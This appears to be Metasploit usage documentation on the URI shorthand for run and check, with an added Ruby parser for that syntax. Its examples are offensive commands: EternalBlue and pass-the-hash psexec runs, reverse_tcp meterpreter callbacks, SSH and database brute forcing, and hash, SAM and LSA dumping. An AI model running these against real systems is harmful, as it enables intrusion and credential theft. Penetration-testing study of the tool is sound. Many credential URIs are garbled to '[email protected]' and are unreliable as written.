Using Metasploit
Depending on your skill level: if you have no prior experience with Metasploit, the following resources may be a better starting point:
- https://tryhackme.com/room/rpmetasploit
- http://www.offensive-security.com/metasploit-unleashed/Main_Page
- https://metasploit.help.rapid7.com/docs/
- https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/
- https://github.com/rapid7/metasploitable3
Common Metasploit usage, loading a module and setting multiple options:
use exploit/linux/postgres/postgres_payload
set username administrator
set password pass
set rhost 192.168.123.6
set rport 5432
set database postgres
set lhost 192.168.123.1
set lport 5000
run
You can also specify multiple space-separated RHOSTS, or use a CIDR subnet mask:
set rhosts 127.0.0.1 127.0.0.2
set rhosts 127.0.0.1/24
This document describes the modern way of setting multiple options in a single command. Keeping everything in one command not only makes it easier to reverse-search the command history with CTRL+R in the Metasploit console, but also makes cheat sheets easy to share between pentesters.
Metasploit now supports a URI string as an argument to the run command, which specifies the RHOST value and option values at once:
use exploit/linux/postgres/postgres_payload
run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000
The following protocols are currently supported and are described in more detail below:
- cidr - can be combined with the other protocols to specify a subnet mask length
- file - loads a series of newline-separated RHOST values from a file. The file may also contain URI strings
- http
- https
- mysql
- postgres
- smb
- ssh
Regardless of the protocol, wrap the URI in quotes to preserve spaces:
use auxiliary/admin/postgres/postgres_sql
run 'postgres://user:this is my [email protected]/database_name' sql='select version()'
In some cases escaping quotes in a password may be too cumbersome. In that case the password option can still be set manually, with the URI argument omitting the password; the module gracefully falls back to the manually set password:
set password !@£$%^&*()"'
run smb://[email protected]
You can also specify multiple RHOST arguments and supply additional built-in options:
use scanner/smb/smb_enumshares
run smb://test:[email protected] smb://user:[email protected] smb://test:[email protected] verbose=true
Auxiliary modules:
use auxiliary/scanner/http/title
run http://example.com https://example.com https://foo.example.com/bar
Specifying credentials and payload arguments:
use exploit/unix/http/cacti_filter_sqli_rce
run http://admin:[email protected]/cacti/ lhost=tun0 lport=4444
run 'http://admin:pass with [email protected]/cacti/' lhost=tun0 lport=4444
Specifying a port:
run http://192.168.123.6:9001
You can use the HttpTrace option to print all HTTP requests and responses to the Metasploit console, and enable verbose logging:
use auxiliary/scanner/http/title
run http://example.com HttpTrace=true verbose=true
Send HTTP requests through a proxy, such as the BurpSuite proxy:
use auxiliary/scanner/http/title
run http://example.com HttpTrace=true verbose=true proxies=HTTP:127.0.0.1:8080
If the module has no username/password options, for instance one that logs in to the admin portal of a web application, then credentials supplied via the HTTP URI will set the HttpUsername/HttpPassword options, which are used for HTTP Basic access authentication.
For example, in the following module the username/password options will be set, while the HttpUsername/HttpPassword options will not:
use exploit/unix/http/cacti_filter_sqli_rce
Module options (exploit/unix/http/cacti_filter_sqli_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
... Omitted ...
* PASSWORD admin no Password to login with
TARGETURI /cacti/ yes The URI of Cacti
* USERNAME user yes User to login with
... Omitted ...
msf > check http://admin:[email protected]/cacti/
USERNAME and PASSWORD will be set to 'admin' and 'user'
For the following module, as there are no USERNAME/PASSWORD options, the HttpUsername/HttpPassword options will be chosen instead, for HTTP Basic access authentication purposes:
use exploit/multi/http/tomcat_mgr_deploy
run http://admin:[email protected]:8888 HttpTrace=true verbose=true lhost=192.168.123.1
Note that the HttpUsername/HttpPassword parameters may not appear in the options output, but can be found in the advanced module options:
use auxiliary/scanner/http/title
advanced
Module advanced options (auxiliary/scanner/http/title):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
* HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
* HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
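An added example, not Metasploit's own code, of a parser for the RHOSTS URI syntax described above (cidr: prefix, domain;user, passwords with spaces or none at all) together with the rule that credentials go to USERNAME/PASSWORD when the module declares them and to HttpUsername/HttpPassword otherwise. The SMBDomain option name and IPv4-only CIDR expansion via Ruby's IPAddr are assumptions.

```ruby
# Added example of the RHOSTS URI syntax shown on this page; not Metasploit's own
# code. Assumed: SMBDomain option name, IPv4-only CIDR expansion via IPAddr.
require 'ipaddr'

# Splits "cidr:/24:smb://..." into [mask_length, inner_uri]; mask is nil if absent.
def split_cidr_prefix(uri)
  m = uri.match(%r{\Acidr:/(\d{1,3}):(.+)\z})
  m ? [m[1].to_i, m[2]] : [nil, uri]
end

# Parses "<scheme>://[[domain;]user[:password]@]host[:port][/path]".
# The password may contain spaces (the page quotes such URIs) but not '@'.
def parse_target_uri(uri)
  mask, inner = split_cidr_prefix(uri)
  m = inner.match(%r{\A(\w+)://(?:([^@]*)@)?([^/:]+)(?::(\d+))?(/.*)?\z})
  raise ArgumentError, "unparseable target URI: #{uri}" unless m
  scheme, userinfo, host, port, path = m.captures
  result = { scheme: scheme, host: host, port: port&.to_i, path: path, cidr: mask }
  if userinfo
    cred, password = userinfo.split(':', 2)      # password is nil when omitted
    domain, user = cred.include?(';') ? cred.split(';', 2) : [nil, cred]
    result.merge!(domain: domain, username: user, password: password)
  end
  result
end

# Expands host plus a cidr mask into every address of the subnet.
def expand_rhosts(parsed)
  return [parsed[:host]] unless parsed[:cidr]
  IPAddr.new("#{parsed[:host]}/#{parsed[:cidr]}").to_range.map(&:to_s)
end

# Applies a URI to a module's option hash following the rules on this page:
# USERNAME/PASSWORD when the module declares them, else HttpUsername/HttpPassword
# (HTTP Basic auth); a URI without a password leaves a manually set one untouched.
def apply_uri(options, uri)
  p = parse_target_uri(uri)
  opts = options.dup
  opts['RHOSTS'] = expand_rhosts(p).join(' ')
  opts['RPORT'] = p[:port] if p[:port]
  opts['TARGETURI'] = p[:path] if p[:path] && opts.key?('TARGETURI')
  opts['SMBDomain'] = p[:domain] if p[:domain]
  if p[:username]
    user_key, pass_key = opts.key?('USERNAME') ? %w[USERNAME PASSWORD] : %w[HttpUsername HttpPassword]
    opts[user_key] = p[:username]
    opts[pass_key] = p[:password] unless p[:password].nil?
  end
  opts
end
```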
Enumerate the SMB version:
use auxiliary/scanner/smb/smb_version
run smb://10.10.10.161
Enumerate SMB shares:
use auxiliary/scanner/smb/smb_enumshares
run smb://10.10.10.161
run smb://user:[email protected]
run 'smb://domain;user with spaces:[email protected]' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1
Enumerate SMB shares and recursively list the files in them:
use auxiliary/scanner/smb/smb_enumshares
run 'smb://user:pass with a [email protected]' showfiles=true spidershares=true
Enumerate users:
use auxiliary/scanner/smb/smb_enumusers
run smb://user:[email protected]
Enumerate gpp files in an SMB share:
use auxiliary/scanner/smb/smb_enum_gpp
run smb://192.168.123.13/share_name verbose=true store=true
run smb://user:[email protected]/share_name verbose=true store=true
Create a mock SMB server which accepts credentials before returning NT_STATUS_LOGON_FAILURE. The captured hashes can then be cracked later:
use auxiliary/server/capture/smb
run
Check exploitability:
use auxiliary/scanner/smb/smb_ms17_010
check 10.10.10.23
check 10.10.10.0/24
check smb://user:[email protected]/
check smb://domain;user:[email protected]/
check cidr:/24:smb://user:[email protected] threads=32
As of 2021, Metasploit supports a single exploit module that has the capability to target Windows 7, Windows 8.1, Windows 2012 R2 and Windows 10; full details are in the Metasploit wrap-up:
use exploit/windows/smb/ms17_010_eternalblue
run 10.10.10.23 lhost=192.168.123.1
run 10.10.10.0/24 lhost=192.168.123.1 lport=5000
run smb://user:[email protected]/ lhost=192.168.123.1
run smb://domain;user:[email protected]/ lhost=192.168.123.1
Run psexec against a remote host using account credentials:
use exploit/windows/smb/psexec
run smb://user:[email protected] lhost=192.168.123.1 lport=5000
Run psexec using an NTLM hash:
use exploit/windows/smb/psexec
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000
Dump SAM and LSA hashes:
use auxiliary/gather/windows_secrets_dump
run smb://user:[email protected]
Dump secrets using an NTLM hash:
use auxiliary/gather/windows_secrets_dump
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]
Download a file:
use auxiliary/admin/smb/download_file
run smb://a:[email protected]/my_share/helloworld.txt
Upload a file:
use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt
Get the SSH version:
use auxiliary/scanner/ssh/ssh_version
run ssh://127.0.0.1
Brute force an account with a known username and a password wordlist:
use scanner/ssh/ssh_login
run ssh://[email protected] threads=50 pass_file=./rockyou.txt
Brute force account credentials:
use scanner/ssh/ssh_login
run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
Brute force across a CIDR range:
use scanner/ssh/ssh_login
run cidr:/24:ssh://user:[email protected] threads=50
run cidr:/24:ssh://[email protected] threads=50 pass_file=./rockyou.txt
If you have SSH credentials, you can create a Metasploit session with the ssh_login module:
use scanner/ssh/ssh_login
run ssh://user:[email protected]
Detect hosts in a subnet where the SSH credentials are reused:
use scanner/ssh/ssh_login
run cidr:/24:ssh://user:[email protected] threads=50
Specify a non-default SSH port:
use scanner/ssh/ssh_login
run ssh://user:[email protected]:2222
As with Meterpreter, you can port forward through a Metasploit SSH session:
route add 172.18.103.0/24 ssh_session_id
Add a route via the most recently opened Meterpreter session:
route add 172.18.103.0/24 -1
For example, when running a MySQL target:
docker run -it --rm -e MYSQL_ROOT_PASSWORD=' a b c p4$$w0rd' -p 3306:3306 mariadb:latest
Enumerate the version:
use auxiliary/scanner/mysql/mysql_version
run mysql://127.0.0.1
If you have MySQL credentials:
use auxiliary/scanner/mysql/mysql_login
run 'mysql://root: a b c [email protected]'
Test MySQL credential reuse across a subnet:
use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
Specify a non-default port:
use auxiliary/scanner/mysql/mysql_login
run mysql://user:[email protected]:2222
Brute force with a known username and a password wordlist:
use auxiliary/scanner/mysql/mysql_login
run mysql://[email protected] threads=50 pass_file=./rockyou.txt
Brute force account credentials:
use auxiliary/scanner/mysql/mysql_login
run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
Brute force across a subnet:
use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
run cidr:/24:mysql://[email protected] threads=50 pass_file=./rockyou.txt
Dump usernames and hashes:
use auxiliary/scanner/mysql/mysql_hashdump
run 'mysql://root: a b c [email protected]'
List information about non-default tables:
use auxiliary/scanner/mysql/mysql_schemadump
run 'mysql://root: a b c [email protected]'
Execute SQL:
use admin/mysql/mysql_sql
run 'mysql://root: a b c [email protected]' sql='select version()'
For example, when running a PostgreSQL target:
docker run --rm -p 5432:5432 -e POSTGRES_PASSWORD=password postgres:13.1-alpine
Get the version:
use auxiliary/scanner/postgres/postgres_version
run postgres://192.168.123.13
run postgres://postgres:[email protected]
If you have PostgreSQL credentials to verify:
use auxiliary/scanner/postgres/postgres_login
run 'postgres://root: a b c [email protected]'
Test PostgreSQL credential reuse across a subnet:
use auxiliary/scanner/postgres/postgres_login
run cidr:/24:postgres://user:[email protected] threads=50
Specify a non-default port:
use auxiliary/scanner/postgres/postgres_login
run postgres://user:[email protected]:2222
Brute force a known account with a password wordlist:
use auxiliary/scanner/postgres/postgres_login
run postgres://[email protected] threads=50 pass_file=./rockyou.txt
Brute force credentials:
use auxiliary/scanner/postgres/postgres_login
run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
Verify account credentials across a subnet:
use auxiliary/scanner/postgres/postgres_login
run cidr:/24:postgres://user:[email protected] threads=50
run cidr:/24:postgres://[email protected] threads=50 pass_file=./rockyou.txt
Capture PostgreSQL logins:
use auxiliary/server/capture/postgresql
run
If a client connects to the server created above:
psql postgres://postgres:mysecretpassword@localhost:5432
Metasploit outputs the captured login credentials:
msf6 auxiliary(server/capture/postgresql) >
[*] Started service listener on 0.0.0.0:5432
[*] Server started.
[+] PostgreSQL LOGIN 127.0.0.1:60406 postgres / mysecretpassword / postgres
Dump usernames and hashes:
use auxiliary/scanner/postgres/postgres_hashdump
run postgres://postgres:[email protected]
run postgres://postgres:[email protected]/database_name
Dump the table schema:
use auxiliary/scanner/postgres/postgres_schemadump
run postgres://postgres:[email protected]
run postgres://postgres:[email protected] ignored_databases=template1,template0,postgres
Execute SQL:
use auxiliary/admin/postgres/postgres_sql
run 'postgres://user:this is my [email protected]/database_name' sql='select version()'
Run the exploit, specifying the payload and target:
use exploit/linux/postgres/postgres_payload
run postgres://postgres:[email protected] lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64'
Upgrade a specific session to Meterpreter:
sessions -u 3
Upgrade the most recently opened session to Meterpreter using the sessions command:
sessions -u -1
A session can also be upgraded manually with the shell_to_meterpreter module:
use multi/manage/shell_to_meterpreter
run session=-1
run session=-1 win_transfer=POWERSHELL
run session=-1 win_transfer=VBS
Post modules can be run against a specified session:
use post/windows/gather/credentials/gpp
run session=-1